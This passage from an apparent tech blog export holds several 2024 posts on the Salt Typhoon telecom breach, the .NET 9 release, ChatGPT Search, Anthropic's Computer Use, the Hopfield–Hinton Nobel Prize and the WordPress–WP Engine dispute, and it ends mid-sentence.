The US has attributed similar campaigns to Chinese groups (Volt Typhoon targeting critical infrastructure, APT41 targeting a wide range of sectors) with increasing frequency. China denies involvement, as it always does.\nWhat\u0026rsquo;s changed is the target selection. Previous campaigns focused on intellectual property theft or espionage against government agencies. Targeting telecom infrastructure — the backbone of civilian communication — represents an escalation. It\u0026rsquo;s the kind of capability you develop not just for intelligence gathering, but for potential disruption during a conflict.\nFor those of us in the tech industry, this is a reminder that cybersecurity isn\u0026rsquo;t just a technical problem. It\u0026rsquo;s a geopolitical reality that shapes the risk landscape for every system we build and operate.\nThe Response So Far # CISA and the FBI have issued advisories. Congress is holding briefings. The telecom companies are working with investigators. But the structural problem — that US telecom infrastructure is a patchwork of legacy and modern systems with mandated access points — isn\u0026rsquo;t going to be solved by any single response.\nSenator Ron Wyden has already called for investigations into why CALEA systems were so vulnerable. The FCC is reportedly considering new cybersecurity requirements for telecom providers. These are steps in the right direction, but they\u0026rsquo;re also years overdue.\nMy Take # In thirty years of working in technology, I\u0026rsquo;ve watched the security landscape evolve from script kiddies and worms to nation-state operations targeting critical infrastructure. Salt Typhoon represents a maturation of offensive cyber capabilities that should make every infrastructure engineer uncomfortable.\nThe hardest lesson here is that our regulatory frameworks can create security vulnerabilities. 
Laws written with good intentions — enabling lawful surveillance — created the exact weakness that adversaries exploited. This should make us deeply skeptical of any proposal that intentionally weakens system security, regardless of the justification.\nFor those of us building systems today, the practical takeaway is to assume that any mandated access point, any monitoring capability, any administrative interface is a target. Design accordingly. Monitor accordingly. And push back — through appropriate channels — when regulations demand architectural decisions that compromise security.\nThe telecom industry is learning this lesson the hard way. Let\u0026rsquo;s make sure the rest of us learn it from their experience rather than our own.\nThis is part of my Security in Practice series, examining real-world security events and their implications for software engineering.\n","date":"14 November 2024","externalUrl":null,"permalink":"/posts/241114-salt-typhoon-telecom-breach/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Salt Typhoon campaign has compromised major US telecom providers, exposing the fragility of critical infrastructure and the growing sophistication of state-sponsored cyber operations.","title":"Salt Typhoon and the Telecom Breach — Infrastructure Under Siege","type":"posts"},{"content":".NET Conf 2024 kicked off this week, and with it comes the official release of .NET 9. After tracking this platform\u0026rsquo;s evolution since the early days of the original .NET Framework, I can say with some authority that the trajectory over the past few years has been remarkable. 
.NET 9 isn\u0026rsquo;t a revolution — it\u0026rsquo;s a refinement — but the cumulative effect of consistent, high-quality releases has made .NET one of the most compelling platforms for building modern software.\nLet me dig into what matters and what it means for those of us building production systems.\nPerformance: The Gift That Keeps Giving # Every .NET release brings performance improvements, and at some point you\u0026rsquo;d expect diminishing returns. .NET 9 says otherwise. The runtime team has delivered measurable gains across the board, with particular focus on areas that matter for cloud-native workloads.\nThe JIT compiler continues to get smarter. Dynamic PGO (Profile-Guided Optimization), which was introduced in earlier releases, has been further refined. The compiler now makes better decisions about inlining, loop optimization, and vectorization based on actual runtime behavior. In practice, this means applications that have been running for a while get progressively faster as the JIT identifies hot paths.\nServer GC has received significant attention. For containerized workloads — which is how most of us deploy these days — the garbage collector is better at understanding memory pressure signals from the container runtime. This translates to fewer OOM kills and more predictable latency under load.\nThe numbers from the TechEmpower benchmarks continue to be impressive. ASP.NET Core has been trading top positions with Rust and C++ frameworks, which is extraordinary for a garbage-collected runtime. For most teams, the performance delta between .NET and systems languages is no longer a valid reason to choose the harder path.\nCloud-Native First # The Aspire stack, introduced as a preview in .NET 8, reaches a more mature state with .NET 9. For those unfamiliar, .NET Aspire is an opinionated framework for building observable, production-ready distributed applications. 
It handles service discovery, health checks, telemetry, and configuration in a way that feels integrated rather than bolted on. This aligns with broader platform maturity and observability evolution.\nWhat I appreciate about Aspire\u0026rsquo;s approach is that it doesn\u0026rsquo;t try to hide the complexity of distributed systems — it just removes the boilerplate. You still need to understand service communication patterns, resilience strategies, and observability. But you don\u0026rsquo;t need to wire up OpenTelemetry exporters, configure health check endpoints, or write service discovery logic from scratch. Similar pragmatic approaches are evident in JavaScript runtime ecosystems and Rust\u0026rsquo;s foundational improvements.\nThe integration with Azure Container Apps and Kubernetes has deepened. The aspire manifest tooling can generate deployment artifacts that map cleanly to container orchestration platforms. Understanding cloud infrastructure choices and infrastructure-as-code approaches matters for deployment decisions. It\u0026rsquo;s not lock-in — the generated manifests are standard Kubernetes YAML or Bicep templates — but it does make the Azure path smooth enough that teams will gravitate toward it.\nC# 13: Measured Progress # C# 13 ships with .NET 9, and the language team continues their philosophy of incremental, well-considered additions rather than feature bloat. The headline features include:\nparams collections: The params keyword now works with any collection type, not just arrays. This is a small change that eliminates a surprising number of allocation-heavy patterns in everyday code.\nNew Lock type: A purpose-built System.Threading.Lock type that\u0026rsquo;s more efficient than locking on arbitrary objects. 
This is the kind of change that reflects maturity: fixing a decades-old pattern that everyone knew was suboptimal but nobody had a clean replacement for.\nfield keyword in properties (a preview feature in C# 13): Semi-auto properties that let you access the backing field directly. This eliminates a whole category of \u0026ldquo;I need a full property just to add one line of validation\u0026rdquo; situations.\nNone of these are flashy. All of them reduce friction in daily development. That\u0026rsquo;s exactly what a mature language should be doing.\nThe Broader .NET Story # Stepping back from the specific release, what strikes me is how effectively Microsoft has executed the .NET transformation over the past eight years. The journey from .NET Framework (Windows-only, closed-source, stagnant) to modern .NET (cross-platform, open-source, cutting-edge performance) is one of the most successful platform reinventions in software history.\nThe developer experience gap with other ecosystems has largely closed. Hot reload works well. The CLI tooling is excellent. The package ecosystem (NuGet) is mature. IDE support spans VS Code, Visual Studio, and JetBrains Rider. You can develop on Mac or Linux without feeling like a second-class citizen.\nWhat still needs work is perception. In many tech circles, .NET still carries the baggage of its Windows-only, enterprise-only past. I regularly meet developers who dismissed .NET years ago and haven\u0026rsquo;t looked back. If that\u0026rsquo;s you, it\u0026rsquo;s worth another look, just as competition among runtimes like Deno has intensified, driving innovation across all platforms. The platform in 2024 bears little resemblance to the one you left.\nMy Take # I\u0026rsquo;ve been working across multiple language ecosystems throughout my career, and I use whatever tool fits the job. The focus on systems-level performance improvements is evident across the platform ecosystem, and .NET is no exception. 
But I have to give credit where it\u0026rsquo;s due: the .NET team has been executing at an exceptionally high level. The annual release cadence, the commitment to performance, and the willingness to make breaking changes when necessary (the Framework-to-Core transition) have all paid off. Tooling integration with AI-powered development environments is becoming increasingly important for developer adoption.\n.NET 9 specifically is a strong release for cloud-native development. If you\u0026rsquo;re building microservices, APIs, or background processing systems, the combination of performance, observability (through Aspire), and deployment tooling is hard to beat. The Aspire framework in particular deserves more attention from the broader developer community.\nThe one area where I\u0026rsquo;d push Microsoft is the AI story. Every platform is racing to integrate AI capabilities, and while .NET has Semantic Kernel and various Azure AI integrations, the developer experience for building AI-powered features still feels more natural in Python. With .NET 9 laying a solid foundation, I\u0026rsquo;m hoping .NET 10 makes AI development a first-class experience.\nFor now, if you\u0026rsquo;re already in the .NET ecosystem, upgrade and enjoy the improvements. If you\u0026rsquo;re not, .NET 9 is as good a time as any to take a fresh look.\nThis is part of my Developer Landscape series, tracking the trends and shifts that shape how we build software.\n","date":"7 November 2024","externalUrl":null,"permalink":"/posts/241107-dotnet-9-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft ships .NET 9 at .NET Conf 2024, delivering significant performance improvements and deeper cloud-native integration that solidify its position as a top-tier platform.","title":".NET 9 Arrives — Performance, Cloud-Native, and the Maturing Ecosystem","type":"posts"},{"content":"Happy Halloween. 
And if you work at Google, this might actually be scary: OpenAI officially launched ChatGPT Search this week, integrating live web search results directly into ChatGPT\u0026rsquo;s conversational interface. It\u0026rsquo;s available to Plus and Team subscribers now, with plans to roll out to free users eventually. After months of rumors and the earlier SearchGPT prototype, the feature is real and it\u0026rsquo;s polished enough to be genuinely useful.\nI\u0026rsquo;ve spent the past few days using it as my primary search tool for technical queries, and I have thoughts.\nHow It Works # ChatGPT Search isn\u0026rsquo;t just a wrapper around Bing results pasted into a chat window. OpenAI has built a custom search integration that combines real-time web crawling with advanced foundation model capabilities to synthesize and summarize information. When you ask a question, ChatGPT can now pull in current information from the web, cite its sources with inline links, and present the information in a conversational format.\nThe visual presentation is clean — sources appear as clickable citations, and there\u0026rsquo;s a sidebar showing the referenced pages. You can click through to the original sources, which addresses one of the biggest criticisms of AI-generated answers: that they obscure where the information comes from.\nUnder the hood, OpenAI partnered with multiple news publishers and data providers. They\u0026rsquo;re using their own web crawler (OAI-SearchBot) alongside data partnerships to build a search index. The announcement emphasizes that publishers can control how their content appears and benefit from traffic driven by citations.\nThe Search Experience Is Different # What strikes me most isn\u0026rsquo;t the technology — it\u0026rsquo;s how differently you approach information retrieval when search is conversational. 
With traditional search, you\u0026rsquo;ve been trained over two decades to craft keywords, scan blue links, click through to pages, evaluate content, and synthesize your own understanding. With ChatGPT Search, you ask a question in natural language and get a synthesized answer.\nFor technical queries, this is genuinely faster. I asked about Kubernetes 1.31 deprecations, and instead of clicking through three different blog posts and cross-referencing release notes, I got a comprehensive summary with citations I could verify. For debugging-style queries (\u0026ldquo;why does my Go program panic when using sync.Map with concurrent deletes\u0026rdquo;), the conversational format lets me follow up naturally without reformulating search queries.\nBut there are trade-offs. The synthesized answers can create a false sense of completeness. When Google gives you ten blue links, you implicitly understand that you\u0026rsquo;re seeing a selection of perspectives. When ChatGPT gives you a flowing paragraph, it\u0026rsquo;s easy to forget that it\u0026rsquo;s making editorial choices about what to include and what to leave out.\nWhat This Means for Developers # If you build anything that depends on web traffic from search — documentation sites, developer blogs, tool landing pages — you need to start thinking about this now.\nThe traditional SEO playbook is about ranking in a list of links. But when an AI synthesizes content from multiple sources into a single answer, the question becomes: does your content get cited? And even if it does, will users click through when the answer is already in front of them?\nThis is the zero-click search problem that Google\u0026rsquo;s featured snippets already created, but amplified significantly. Early data from SearchGPT prototypes suggests that click-through rates to source pages are lower than traditional search, though OpenAI claims their citation-heavy approach mitigates this. 
As AI systems become more prevalent in information access, questions about transparency and data usage become increasingly important.\nFor developer tools and libraries, discoverability might actually improve. Right now, finding the right library for a specific task involves a lot of keyword guessing and Reddit searching. A conversational search that understands your requirements and can compare options is genuinely more useful.\nThe Infrastructure Question # Running a real-time search engine is an entirely different infrastructure challenge than running an LLM inference service. Google\u0026rsquo;s search infrastructure is one of the most sophisticated systems ever built — billions of pages indexed, updated continuously, served with sub-second latency at massive scale.\nOpenAI is entering this space as a relative newcomer to search infrastructure. The quality of results depends not just on the AI model but on the freshness and breadth of the underlying search index. Early testing shows that ChatGPT Search handles popular topics well but can struggle with very recent events (latency of hours rather than minutes) and niche topics where the index may not have comprehensive coverage.\nThere\u0026rsquo;s also the cost question. Every search query now involves not just index lookup but also LLM inference to synthesize the answer. That\u0026rsquo;s orders of magnitude more compute per query than traditional search. OpenAI\u0026rsquo;s pricing strategy will need to account for this — it\u0026rsquo;s one reason the feature is gated to paid users first.\nMy Take # I don\u0026rsquo;t think ChatGPT Search is going to replace Google next week, or next year. Google has massive advantages in index coverage, latency, and the ecosystem of specialized search features (maps, shopping, images, knowledge panels) that have accumulated over 25 years.\nBut ChatGPT Search is good enough to change behavior, and that\u0026rsquo;s what matters. 
For certain categories of queries — particularly research-oriented, technical, and comparison queries — the conversational format is simply superior to a list of links. I\u0026rsquo;ve caught myself reaching for ChatGPT instead of Google several times this week, and each time the experience was at least as good.\nThe real story here isn\u0026rsquo;t one product versus another. It\u0026rsquo;s the beginning of a fundamental shift in how information retrieval works. We\u0026rsquo;ve had essentially the same search paradigm since the late 1990s: type keywords, get links, click through, read. AI-powered search offers a different paradigm: describe what you need, get a synthesized answer, verify with sources. This connects to broader platform strategies like Microsoft\u0026rsquo;s AI platform approach where AI assistance is becoming central to how users interact with information.\nThat shift is going to take years to fully play out, but the starting gun has fired. If you\u0026rsquo;re building for the web, it\u0026rsquo;s time to think about what your content strategy looks like in a world where the first point of contact is an AI synthesis, not a link to your page.\nThis is part of my AI in Development series, exploring the practical impact of AI advances on software engineering.\n","date":"31 October 2024","externalUrl":null,"permalink":"/posts/241031-chatgpt-search-launches/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI launches ChatGPT Search, integrating real-time web search directly into its chatbot. The implications for search, SEO, and how we find information are enormous.","title":"ChatGPT Search Is Here — Should Google Be Worried?","type":"posts"},{"content":"Anthropic dropped something genuinely surprising this week. 
Alongside an upgraded Claude 3.5 Sonnet model that pushes the state of the art on coding benchmarks, they introduced a feature called \u0026ldquo;Computer Use\u0026rdquo;: the ability for Claude to directly see and interact with a computer screen, move the mouse, click buttons, and type text. It\u0026rsquo;s available as a public beta in the API, and after spending a couple of days experimenting with it, I think this is one of the most consequential AI releases of the year.\nWe\u0026rsquo;ve been talking about AI agents for a while now. Everyone and their startup has been promising autonomous systems that can perform complex tasks. But most of those agents work through structured APIs and carefully defined tool interfaces. What Anthropic has done is fundamentally different: they\u0026rsquo;ve given Claude the same interface a human uses. A screen. A mouse. A keyboard.\nHow Computer Use Actually Works # The technical implementation is clever. Claude requests screenshots of the desktop as it works, analyzes what\u0026rsquo;s on screen using its vision capabilities, and then issues mouse movements, clicks, and keystrokes through a standardized tool interface. It\u0026rsquo;s essentially a very sophisticated screen-scraping agent, but one backed by a model that can genuinely understand what it\u0026rsquo;s looking at.\nIn the API documentation, Anthropic provides a Docker-based reference implementation that sets up a virtual desktop environment. You spin up the container, connect Claude to it, and give it natural language instructions. The model then figures out how to accomplish the task by interacting with the GUI.\nI tested it with several scenarios: filling out web forms, navigating multi-step workflows in web applications, and basic file management tasks. The results are impressive but imperfect. 
Claude can navigate most standard interfaces, but it occasionally misclicks, struggles with unusual UI patterns, and can get confused by popup dialogs it doesn\u0026rsquo;t expect.\nThe latency is notable too — each action requires a screenshot, API call, and response cycle, so tasks that a human could complete in seconds take minutes. But the accuracy on straightforward workflows is genuinely high.\nWhy This Matters More Than You Think # The reason Computer Use is significant isn\u0026rsquo;t because it\u0026rsquo;s polished — it\u0026rsquo;s not, and Anthropic is explicit about that. It matters because it solves the integration problem that has plagued AI agents from the start.\nEvery time you want an AI agent to interact with a tool, you traditionally need to build an API integration. Want it to work with your CRM? Build a connector. Your internal admin panel? Another connector. That legacy system from 2008 that only has a web interface? Good luck.\nComputer Use sidesteps all of that. If a human can use a tool through a screen, Claude can theoretically use it too. No API needed. No integration work. This has enormous implications for enterprise automation, where the majority of workflows still involve humans clicking through web applications.\nThink about the long tail of internal tools that will never get proper API coverage. Think about testing scenarios where you need to verify actual user-facing behavior. Think about accessibility — Computer Use could become the foundation for assistive technology that helps people interact with software that wasn\u0026rsquo;t designed with accessibility in mind.\nThe Security Implications # Now, let me put on my paranoid hat for a moment, because the security implications here are significant.\nAn AI that can see your screen and control your mouse has access to everything you can see and do. 
The reference implementation runs in a sandboxed Docker container, which is the right approach, but I can already imagine the pressure to run this against production environments.\nAnthropic\u0026rsquo;s documentation includes explicit warnings: don\u0026rsquo;t give Computer Use access to sensitive data, don\u0026rsquo;t let it interact with systems where mistakes have real consequences, and be cautious about prompt injection through on-screen content. That last point is critical — if Claude is reading web pages to complete tasks, a malicious page could include text designed to manipulate the AI\u0026rsquo;s behavior.\nThese aren\u0026rsquo;t hypothetical concerns. The first time someone connects Computer Use to a browser session with their banking credentials accessible, we\u0026rsquo;ll have a case study in why sandbox boundaries matter.\nThe Upgraded Model Underneath # It\u0026rsquo;s worth noting that the Claude 3.5 Sonnet upgrade itself is substantial, even apart from Computer Use. The new model scores 49.0% on SWE-bench Verified, up from 33.4% on the previous version. That\u0026rsquo;s a massive jump in the ability to solve real-world software engineering tasks. It aligns with broader advances in AI reasoning capabilities where models are gaining the ability to break down complex problems, a trend that the emergence of reasoning models like o1 demonstrates across the industry.\nOn the agentic tool-use benchmark TAU-bench, the improvements are similarly dramatic. This suggests Anthropic has specifically optimized for the kind of multi-step reasoning and tool use that agents require. The model is getting better not just at understanding code but at executing multi-step plans involving code changes.\nFor developers who use Claude in their daily workflow, the practical impact is noticeable. 
Complex refactoring suggestions are more accurate, multi-file changes are more coherent, and the model handles larger contexts with less degradation.\nMy Take # I\u0026rsquo;ve been building and integrating software systems for a long time, and the moment an AI can interact with any GUI application feels like a genuine inflection point. Not because it\u0026rsquo;s ready for production — it absolutely isn\u0026rsquo;t yet — but because it removes a barrier that has kept AI agents theoretical rather than practical.\nThe most interesting applications won\u0026rsquo;t be the obvious ones. Yes, you can use it to automate form filling or data entry. But the real value will emerge in testing, in workflow automation for legacy systems, and in creating AI assistants that can meet users where they already work, rather than requiring everything to be rebuilt around API interfaces.\nAnthropic\u0026rsquo;s decision to release this as a beta, with clear warnings about its limitations, is the right approach. This mirrors how other experimental AI capabilities are reaching production maturity. The technology needs to mature, the safety guardrails need to strengthen, and the developer community needs time to establish best practices.\nBut make no mistake — the direction is clear. AI is moving from conversation to action, from text to interaction. 
Computer Use is an early and imperfect step, but it\u0026rsquo;s a step in a direction that will reshape how we think about automation, much like how agentic workflows are transforming development practices.\nThis is part of my AI in Development series, exploring the practical impact of AI advances on software engineering.\n","date":"24 October 2024","externalUrl":null,"permalink":"/posts/241024-anthropic-claude-computer-use/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic’s updated Claude 3.5 Sonnet introduces Computer Use, letting AI directly interact with desktop environments — a significant leap toward autonomous AI agents.","title":"Claude Gets Hands — Anthropic's Computer Use Changes the AI Game","type":"posts"},{"content":"The WordPress ecosystem is on fire, and not in a good way. What started as pointed remarks from Automattic CEO Matt Mullenweg at WordCamp US has spiraled into one of the most dramatic confrontations in open source history. WP Engine has been banned from WordPress.org resources, cease-and-desist letters have flown in both directions, and the community is left picking sides in a fight that touches the very foundations of how open source projects coexist with commercial interests.\nAs someone who has watched open source evolve from a fringe movement to the backbone of the modern software industry, I find this situation both deeply concerning and oddly inevitable.\nWhat Actually Happened # The timeline is dizzying. In late September, Mullenweg publicly called out WP Engine at WordCamp US, accusing them of being a \u0026ldquo;cancer to WordPress\u0026rdquo; and claiming they profit from the WordPress brand without giving back proportionally. WP Engine fired back with a cease-and-desist letter. 
Then Automattic blocked WP Engine\u0026rsquo;s access to WordPress.org plugin and theme repositories, effectively cutting off automatic updates for millions of sites.\nThis week, the situation has only intensified. WP Engine filed a lawsuit against Automattic, alleging extortion and abuse of power. Automattic, in turn, offered employees a severance package to leave if they disagreed with the company\u0026rsquo;s stance — and 159 people took the deal.\nThe technical fallout is real. WP Engine customers couldn\u0026rsquo;t receive plugin updates for a period, creating genuine security concerns. A temporary reprieve was granted, but the uncertainty remains.\nThe Governance Problem Nobody Solved # Here\u0026rsquo;s the uncomfortable truth that this situation exposes: WordPress never properly separated its open source project governance from its commercial interests. WordPress.org — the repository, the plugin ecosystem, the update infrastructure — is effectively controlled by Automattic. The WordPress Foundation exists, but its role in governing the project\u0026rsquo;s infrastructure has always been murky.\nThis is not a new pattern. I\u0026rsquo;ve seen similar tensions play out in other open source projects over the decades, often around licensing conflicts, each raising fundamental questions about the relationship between commercial sponsors and open source communities. The difference is that WordPress powers roughly 43% of the web. The blast radius of a governance failure here is enormous.\nCompare this to how other major projects handle the divide. The Linux Foundation, the Apache Software Foundation, the Cloud Native Computing Foundation — they all maintain explicit separation between the open source project and any single commercial entity. 
It\u0026rsquo;s not perfect, but it creates checks and balances.\nWordPress never built those guardrails, and now we\u0026rsquo;re seeing why they matter.\nThe \u0026ldquo;Giving Back\u0026rdquo; Debate # Mullenweg\u0026rsquo;s core argument is that WP Engine doesn\u0026rsquo;t contribute enough to the WordPress open source project relative to the revenue they generate from it. He\u0026rsquo;s proposed a framework suggesting that large WordPress hosting companies should dedicate a percentage of their resources to core development.\nThere\u0026rsquo;s a kernel of truth here. Free-riding on open source is a real problem, and many companies do extract enormous value from projects they barely contribute to. But the way this argument has been weaponized — using control over project infrastructure to punish a commercial competitor — sets a terrifying precedent.\nIf the maintainer of an open source project can unilaterally cut off access to critical infrastructure because they feel a company isn\u0026rsquo;t \u0026ldquo;contributing enough,\u0026rdquo; then every business built on open source should be worried. Who decides what \u0026ldquo;enough\u0026rdquo; means? By what process? With what accountability?\nI\u0026rsquo;ve been building software on open source foundations for three decades. The social contract has always been: the code is free, you can use it commercially, and contributions are welcomed but not coerced. Breaking that contract — even with good intentions — damages trust that took years to build.\nWhat Developers Should Watch For # If you\u0026rsquo;re running WordPress sites (and statistically, many of you are), here\u0026rsquo;s what to pay attention to:\nUpdate infrastructure: Make sure you have a plan for plugin and theme updates that doesn\u0026rsquo;t solely rely on WordPress.org. Consider manual update workflows as a backup.\nHosting diversification: If you\u0026rsquo;re on WP Engine, you\u0026rsquo;re directly affected. 
But even on other hosts, think about what happens if this pattern repeats with a different target.\nFork potential: There\u0026rsquo;s already talk of forking WordPress. Whether that materializes depends on how this conflict resolves, but it\u0026rsquo;s worth monitoring. A fork would fragment the ecosystem but could also lead to better governance.\nPlugin dependencies: Audit which plugins are critical to your sites and whether they have alternative distribution channels.\nMy Take # I have enormous respect for what Matt Mullenweg has built. WordPress democratized web publishing in ways that changed the internet. But this approach — using infrastructure control as a weapon in a commercial dispute — is wrong, regardless of how valid the underlying complaints about contribution might be.\nThe open source world needs to have an honest conversation about sustainability and fair contribution. But that conversation needs to happen through governance structures, not through unilateral executive action. The WordPress Foundation should be the entity making decisions about WordPress.org access, with transparent policies and due process. Governance models like OpenTofu have demonstrated what effective community-led stewardship can look like when open source projects prioritize transparency and inclusive decision-making.\nWhat we\u0026rsquo;re witnessing is what happens when a project grows to dominate a significant portion of the web without ever building the institutional frameworks to match that responsibility. With supply chain security becoming increasingly critical, governance that ensures ecosystem health and predictability is more important than ever. 
It\u0026rsquo;s a cautionary tale for every open source project that\u0026rsquo;s outgrowing its governance model.\nThe code may be open, but the power structures around it matter just as much.\nThis is part of my Developer Landscape series, tracking the trends and shifts that shape how we build software.\n","date":"17 October 2024","externalUrl":null,"permalink":"/posts/241017-wordpress-wp-engine-open-source-rift/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The WordPress/WP Engine feud has escalated into a full-blown crisis, raising fundamental questions about open source governance and commercial ecosystems.","title":"WordPress vs WP Engine — When Open Source Gets Personal","type":"posts"},{"content":"The Royal Swedish Academy of Sciences announced this week that the 2024 Nobel Prize in Physics goes to John Hopfield and Geoffrey Hinton \u0026ldquo;for foundational discoveries and inventions that enable machine learning with artificial neural networks.\u0026rdquo; For those of us working with AI every day, this feels like a moment where the broader world is catching up to what the field has known for decades: the theoretical foundations of modern AI are rooted in physics.\nBut it\u0026rsquo;s also a decision that has sparked genuine debate — both about what \u0026ldquo;physics\u0026rdquo; means in the context of the Nobel Prize, and about what this recognition signals for AI\u0026rsquo;s role in society.\nThe Science Behind the Prize # John Hopfield, now 91, created what\u0026rsquo;s known as the Hopfield network in 1982 — a form of associative memory inspired by the physics of spin glasses. Spin glasses are disordered magnetic materials studied in statistical mechanics, and Hopfield recognized that the mathematical framework used to describe them could also describe a network of artificial neurons that stores and retrieves patterns. 
The energy function of a Hopfield network is directly analogous to the Hamiltonian in statistical physics.\nGeoffrey Hinton, 76, built on Hopfield\u0026rsquo;s work to develop the Boltzmann machine — a type of neural network that uses principles from statistical mechanics to learn probability distributions over its inputs. The Boltzmann machine, named after the physicist Ludwig Boltzmann, uses concepts of energy and temperature to find optimal configurations, mirroring how physical systems reach equilibrium.\nHinton\u0026rsquo;s later work on backpropagation and deep learning is what most people in the tech industry know him for, but the Nobel Committee specifically cited the earlier, more physics-adjacent work. This is important context: the prize isn\u0026rsquo;t for \u0026ldquo;inventing ChatGPT\u0026rdquo; — it\u0026rsquo;s for recognizing that the mathematical structure of physics could be applied to create learning systems.\nIs This Really Physics? # The most interesting debate surrounding the announcement is whether this work truly belongs under the physics umbrella. Plenty of physicists have grumbled — politely and otherwise — that neural networks, however elegant their mathematical foundations, aren\u0026rsquo;t physics in the traditional sense. They don\u0026rsquo;t describe natural phenomena. They\u0026rsquo;re engineered systems inspired by physics, which is a different thing.\nI have some sympathy for this view. The Nobel Prize in Physics has traditionally honored discoveries about the natural world — quarks, gravitational waves, cosmic background radiation, quantum entanglement. Hopfield and Hinton didn\u0026rsquo;t discover anything about nature; they applied mathematical tools from physics to build something new.\nBut I think the committee is making a deliberate statement: the boundaries between disciplines are dissolving. The same mathematical frameworks that describe magnetic materials can describe learning systems. 
Statistical mechanics doesn\u0026rsquo;t care whether the \u0026ldquo;spins\u0026rdquo; in your system are iron atoms or artificial neurons. The physics is the same.\nAnd frankly, the impact is hard to argue with. The lineage from Hopfield networks through Boltzmann machines to modern deep learning is clear and well-documented. Without these foundational ideas, the AI systems we\u0026rsquo;re building today — including foundation models and their advanced reasoning capabilities — wouldn\u0026rsquo;t exist.\nHinton\u0026rsquo;s Warnings # There\u0026rsquo;s an irony in this recognition that\u0026rsquo;s hard to ignore. Geoffrey Hinton left Google in 2023 specifically so he could speak freely about the dangers of AI. He\u0026rsquo;s been vocal about existential risks, about the potential for AI to be used for misinformation and manipulation, and about the inadequacy of current safety measures. These concerns are becoming increasingly relevant as new open-source reasoning models advance the state of AI capabilities.\nNow the Nobel Committee is celebrating his work — the very work he\u0026rsquo;s spent the past year warning might lead to catastrophic outcomes. In his press conference after the announcement, Hinton reiterated his concerns about AI safety, calling for more research into how to maintain control over systems that might become more intelligent than humans.\nThis juxtaposition — celebration and warning in the same breath — feels emblematic of where we are with AI right now. The technology is simultaneously the most impressive and potentially the most dangerous thing our field has ever produced. Recognition of its scientific foundations doesn\u0026rsquo;t resolve that tension; if anything, it amplifies it.\nWhat This Means for Practitioners # For those of us building AI systems, the Nobel Prize is validation but not vindication. It validates that the field\u0026rsquo;s foundations are scientifically rigorous and important. 
But it doesn\u0026rsquo;t vindicate the hype, the irresponsible deployments, or the tendency to treat these systems as magical rather than mathematical.\nIf anything, recognizing AI\u0026rsquo;s roots in physics should remind us of the discipline that physics demands. Physics is built on careful experimentation, reproducible results, clear uncertainty quantification, and healthy skepticism of grand claims. These are exactly the qualities that AI development too often lacks.\nI\u0026rsquo;d love to see the ML community take this Nobel Prize as a call to be more rigorous, not less. More careful benchmarking. Better uncertainty quantification in model outputs. More honest communication about what these systems can and can\u0026rsquo;t do. The physics-inspired foundations of our field deserve physics-quality rigor in how we build on them.\nMy Take # I think this is the right prize, given to the right people, at roughly the right time. Hopfield and Hinton did foundational work that connects physics to computation in ways that have reshaped the world. Whether you call it physics or not is a semantic debate; the importance of the work is not.\nWhat I find most valuable about this recognition is that it draws attention to the theoretical foundations of AI at a time when the field is increasingly driven by engineering scale — more data, more compute, more parameters. The lesson of Hopfield and Hinton\u0026rsquo;s work is that fundamental ideas matter. 
The architecture of transformer networks, the mathematics of how they learn, the theoretical framework that explains why they work — these matter as much as the GPU clusters that run them.\nIn a field that\u0026rsquo;s moving faster than anyone can fully keep up with, it\u0026rsquo;s good to be reminded where we started and why the foundations matter.\nThis post is part of my ongoing AI in Development series, tracking how artificial intelligence is reshaping software engineering and beyond.\n","date":"10 October 2024","externalUrl":null,"permalink":"/posts/241010-nobel-prize-physics-ai-neural-networks/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The 2024 Nobel Prize in Physics awarded to John Hopfield and Geoffrey Hinton recognizes the foundational physics-inspired work that made modern AI possible.","title":"Nobel Prize in Physics Goes to Neural Network Pioneers — What It Means for AI","type":"posts"},{"content":"The WordPress ecosystem is in turmoil, and for once, it\u0026rsquo;s not about a plugin vulnerability or a Gutenberg controversy. Over the past two weeks, Matt Mullenweg — CEO of Automattic and co-founder of WordPress — has launched an increasingly aggressive campaign against WP Engine, one of the largest WordPress hosting companies. 
What started as a WordCamp keynote criticizing WP Engine\u0026rsquo;s contributions to the open source project has escalated into blocked access to WordPress.org resources, legal threats, and a schism that\u0026rsquo;s shaking the foundation of the web\u0026rsquo;s most popular CMS.\nAs someone who\u0026rsquo;s built and maintained WordPress sites for clients over the years, I\u0026rsquo;m watching this unfold with a mixture of fascination and concern.\nWhat Happened # The timeline is important for understanding how quickly this escalated:\nSeptember 20: Matt Mullenweg publishes a blog post titled \u0026ldquo;WP Engine is not WordPress,\u0026rdquo; criticizing WP Engine for profiting from WordPress without contributing sufficiently to the open source project. He calls them a \u0026ldquo;cancer to WordPress.\u0026rdquo;\nSeptember 23: WP Engine sends Automattic a cease-and-desist letter regarding Mullenweg\u0026rsquo;s statements. Automattic responds with their own C\u0026amp;D, demanding WP Engine pay a trademark licensing fee for using the WordPress and WooCommerce names.\nSeptember 25: Automattic blocks WP Engine\u0026rsquo;s servers from accessing WordPress.org — the repository that hosts plugins, themes, and updates. This means WP Engine customers can\u0026rsquo;t update their plugins and themes through the normal WordPress mechanism.\nSeptember 27: After significant community backlash, the block is temporarily lifted for a \u0026ldquo;brief reprieve\u0026rdquo; to allow WP Engine customers to update their sites.\nOctober 1: The block is reinstated. 
WP Engine begins mirroring the WordPress.org plugin repository on their own infrastructure.\nAnd here we are, with the situation still unfolding.\nThe Underlying Issue # Strip away the personal animosity and legal posturing, and there\u0026rsquo;s a legitimate question at the core of this conflict: what obligations do companies have to the open source projects they profit from?\nWP Engine is a billion-dollar company backed by Silver Lake private equity. They built their entire business on WordPress. Mullenweg\u0026rsquo;s argument is that they contribute far too little back — in code, in community resources, in financial support — relative to what they extract.\nThere\u0026rsquo;s data to support this. WP Engine contributes relatively few hours of developer time to WordPress core compared to Automattic. Their \u0026ldquo;Five for the Future\u0026rdquo; pledge (where WordPress companies commit 5% of their resources to the project) is, by Mullenweg\u0026rsquo;s account, essentially unfulfilled.\nBut the counterargument is equally strong. WP Engine contributes to the WordPress ecosystem in other ways — through developer tools, through making WordPress hosting reliable and accessible, through employing people who build plugins and themes. The open source social contract has never required specific contribution levels, and the GPL license explicitly permits commercial use without strings attached.\nThe Governance Problem # What concerns me most 